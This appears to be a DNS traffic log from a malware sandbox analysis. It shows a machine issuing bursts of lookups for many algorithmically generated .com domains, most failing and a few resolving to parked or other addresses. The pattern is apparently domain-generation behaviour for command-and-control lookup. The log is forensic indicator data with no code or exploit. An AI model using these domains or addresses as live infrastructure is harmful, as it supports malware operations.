                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.215666056 CET192.168.2.61.1.1.10x8194Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255040884 CET192.168.2.61.1.1.10xaf6aStandard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255260944 CET192.168.2.61.1.1.10x61b3Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255413055 CET192.168.2.61.1.1.10xa018Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255559921 CET192.168.2.61.1.1.10x854fStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255709887 CET192.168.2.61.1.1.10x30bcStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255865097 CET192.168.2.61.1.1.10x654fStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255995035 CET192.168.2.61.1.1.10x15e0Standard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256134033 CET192.168.2.61.1.1.10x64adStandard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256274939 CET192.168.2.61.1.1.10xfa03Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256417036 CET192.168.2.61.1.1.10x5bcbStandard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256548882 CET192.168.2.61.1.1.10x1552Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.256777048 CET192.168.2.61.1.1.10x4c86Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.257107019 CET192.168.2.61.1.1.10xd86dStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.257570982 CET192.168.2.61.1.1.10xd431Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.260605097 CET192.168.2.61.1.1.10xd5d7Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.288191080 CET192.168.2.61.1.1.10xcd78Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291335106 CET192.168.2.61.1.1.10x4a47Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291459084 CET192.168.2.61.1.1.10xff66Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291595936 CET192.168.2.61.1.1.10x6cc6Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291686058 CET192.168.2.61.1.1.10xf754Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.291990042 CET192.168.2.61.1.1.10x97d0Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.356265068 CET192.168.2.61.1.1.10x22dcStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367012978 CET192.168.2.61.1.1.10x55c5Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367635012 CET192.168.2.61.1.1.10x9c2Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367661953 CET192.168.2.61.1.1.10x7bbbStandard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367980003 CET192.168.2.61.1.1.10xcf0eStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368146896 CET192.168.2.61.1.1.10x903eStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368264914 CET192.168.2.61.1.1.10x3903Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368479967 CET192.168.2.61.1.1.10x9299Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368987083 CET192.168.2.61.1.1.10xa83cStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.371277094 CET192.168.2.61.1.1.10x2b87Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.371550083 CET192.168.2.61.1.1.10x719aStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.372395992 CET192.168.2.61.1.1.10x31d6Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.380916119 CET192.168.2.61.1.1.10x20bbStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.381063938 CET192.168.2.61.1.1.10x14b3Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383220911 CET192.168.2.61.1.1.10x309bStandard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383456945 CET192.168.2.61.1.1.10xab45Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383521080 CET192.168.2.61.1.1.10xb275Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383761883 CET192.168.2.61.1.1.10x8cecStandard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.384449959 CET192.168.2.61.1.1.10xe014Standard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385081053 CET192.168.2.61.1.1.10x721bStandard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385760069 CET192.168.2.61.1.1.10x5e28Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385926962 CET192.168.2.61.1.1.10x6bfaStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.396886110 CET192.168.2.61.1.1.10x2752Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400593042 CET192.168.2.61.1.1.10xf531Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400737047 CET192.168.2.61.1.1.10x8f3bStandard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400873899 CET192.168.2.61.1.1.10x8a62Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.401611090 CET192.168.2.61.1.1.10x7bd9Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.401792049 CET192.168.2.61.1.1.10xaf7bStandard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402081013 CET192.168.2.61.1.1.10xed2bStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402401924 CET192.168.2.61.1.1.10x827bStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402713060 CET192.168.2.61.1.1.10xed44Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402901888 CET192.168.2.61.1.1.10xbf43Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.403043032 CET192.168.2.61.1.1.10xf69eStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733179092 CET192.168.2.61.1.1.10x6b81Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733474016 CET192.168.2.61.1.1.10xf670Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733495951 CET192.168.2.61.1.1.10x3cd4Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733902931 CET192.168.2.61.1.1.10xa622Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.734031916 CET192.168.2.61.1.1.10x8f0fStandard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.554846048 CET192.168.2.61.1.1.10x7023Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.556314945 CET192.168.2.61.1.1.10xbac3Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.566381931 CET192.168.2.61.1.1.10x5562Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.566734076 CET192.168.2.61.1.1.10x4bb0Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.567681074 CET192.168.2.61.1.1.10x5b7bStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.571909904 CET192.168.2.61.1.1.10x9c1bStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.573148012 CET192.168.2.61.1.1.10xb9b6Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.573973894 CET192.168.2.61.1.1.10x7a31Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.574670076 CET192.168.2.61.1.1.10x7cd7Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.576915026 CET192.168.2.61.1.1.10xd0c8Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.577771902 CET192.168.2.61.1.1.10xd0f2Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.578217983 CET192.168.2.61.1.1.10x7743Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.582288980 CET192.168.2.61.1.1.10xb999Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.585918903 CET192.168.2.61.1.1.10xc93fStandard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.587908983 CET192.168.2.61.1.1.10x70faStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.591660976 CET192.168.2.61.1.1.10xc472Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.609992027 CET192.168.2.61.1.1.10x9702Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.610308886 CET192.168.2.61.1.1.10xe3beStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.614151001 CET192.168.2.61.1.1.10x13efStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.622056007 CET192.168.2.61.1.1.10xd263Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.801790953 CET192.168.2.61.1.1.10x18a3Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802035093 CET192.168.2.61.1.1.10x8b9cStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802381992 CET192.168.2.61.1.1.10x597aStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802584887 CET192.168.2.61.1.1.10x7dbdStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804702044 CET192.168.2.61.1.1.10x8660Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804862022 CET192.168.2.61.1.1.10x1765Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804878950 CET192.168.2.61.1.1.10xc3c2Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805166960 CET192.168.2.61.1.1.10xc859Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805378914 CET192.168.2.61.1.1.10x920bStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805526972 CET192.168.2.61.1.1.10x48b5Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805604935 CET192.168.2.61.1.1.10x7633Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805835962 CET192.168.2.61.1.1.10x20adStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806076050 CET192.168.2.61.1.1.10x6e8eStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806180954 CET192.168.2.61.1.1.10x720aStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806718111 CET192.168.2.61.1.1.10x3f29Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.808319092 CET192.168.2.61.1.1.10xa5c1Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.848514080 CET192.168.2.61.1.1.10xd9d3Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853260994 CET192.168.2.61.1.1.10xa00aStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853765965 CET192.168.2.61.1.1.10x6c86Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.953929901 CET192.168.2.61.1.1.10x929eStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.383105040 CET1.1.1.1192.168.2.60xef39Name error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.384108067 CET1.1.1.1192.168.2.60x258No error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.384108067 CET1.1.1.1192.168.2.60x258No error (0)gahyqah.com162.255.119.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.388629913 CET1.1.1.1192.168.2.60xeb06Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.390916109 CET1.1.1.1192.168.2.60xe122Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391107082 CET1.1.1.1192.168.2.60xa556Name error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391117096 CET1.1.1.1192.168.2.60x9584Name error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392107964 CET1.1.1.1192.168.2.60xe8e0Name error (3)qeqyxov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392117977 CET1.1.1.1192.168.2.60xdebName error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392851114 CET1.1.1.1192.168.2.60x9ea8Name error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392862082 CET1.1.1.1192.168.2.60xaf06Name error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.400861979 CET1.1.1.1192.168.2.60xeb6eName error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401792049 CET1.1.1.1192.168.2.60x21d8No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401792049 CET1.1.1.1192.168.2.60x21d8No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401968002 CET1.1.1.1192.168.2.60x706fName error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.402671099 CET1.1.1.1192.168.2.60x122fName error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403134108 CET1.1.1.1192.168.2.60x1d7fName error (3)qegyqaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403167009 CET1.1.1.1192.168.2.60xc5b7Name error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403513908 CET1.1.1.1192.168.2.60x5eb1Name error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403744936 CET1.1.1.1192.168.2.60xa03bName error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.407493114 CET1.1.1.1192.168.2.60x7a79Name error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.412553072 CET1.1.1.1192.168.2.60x834aName error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.415435076 CET1.1.1.1192.168.2.60x84fName error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.420938015 CET1.1.1.1192.168.2.60xb232Name error (3)lyryvex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.421739101 CET1.1.1.1192.168.2.60x5c23Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.423144102 CET1.1.1.1192.168.2.60x99b8Name error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.424077988 CET1.1.1.1192.168.2.60xa468Name error (3)vowydef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.424088001 CET1.1.1.1192.168.2.60xd82eName error (3)gacyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.425787926 CET1.1.1.1192.168.2.60xf810Name error (3)vofygum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.426613092 CET1.1.1.1192.168.2.60x9a06Name error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433950901 CET1.1.1.1192.168.2.60x5611Name error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.441548109 CET1.1.1.1192.168.2.60xd6a0Name error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.442475080 CET1.1.1.1192.168.2.60x2d41Name error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.443753004 CET1.1.1.1192.168.2.60xc339Name error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444360018 CET1.1.1.1192.168.2.60x627cName error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444370985 CET1.1.1.1192.168.2.60x816cName error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444434881 CET1.1.1.1192.168.2.60x5c4fName error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.445256948 CET1.1.1.1192.168.2.60x9780Name error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.451479912 CET1.1.1.1192.168.2.60xf3cName error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.464906931 CET1.1.1.1192.168.2.60xcef5Name error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.559668064 CET1.1.1.1192.168.2.60x4576No error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.605309010 CET1.1.1.1192.168.2.60x60c7No error (0)qetyfuv.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.608741999 CET1.1.1.1192.168.2.60xb7b6No error (0)puzylyp.com75.2.71.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.608741999 CET1.1.1.1192.168.2.60xb7b6No error (0)puzylyp.com99.83.170.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.625744104 CET1.1.1.1192.168.2.60x23e5No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.672666073 CET1.1.1.1192.168.2.60x6ee0No error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.672666073 CET1.1.1.1192.168.2.60x6ee0No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com85.17.31.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.203.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.203.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.203.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.217.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com5.79.71.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com5.79.71.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com85.17.31.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.290683985 CET1.1.1.1192.168.2.60xfec2No error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)ww8.galyqaz.comdeliver.trafficmotor.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.465537071 CET1.1.1.1192.168.2.60xa83bNo error (0)ww3.galyqaz.comsedoparking.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.465537071 CET1.1.1.1192.168.2.60xa83bNo error (0)sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.362049103 CET1.1.1.1192.168.2.60xe25aNo error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.362049103 CET1.1.1.1192.168.2.60xe25aNo error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.376848936 CET1.1.1.1192.168.2.60x394bName error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
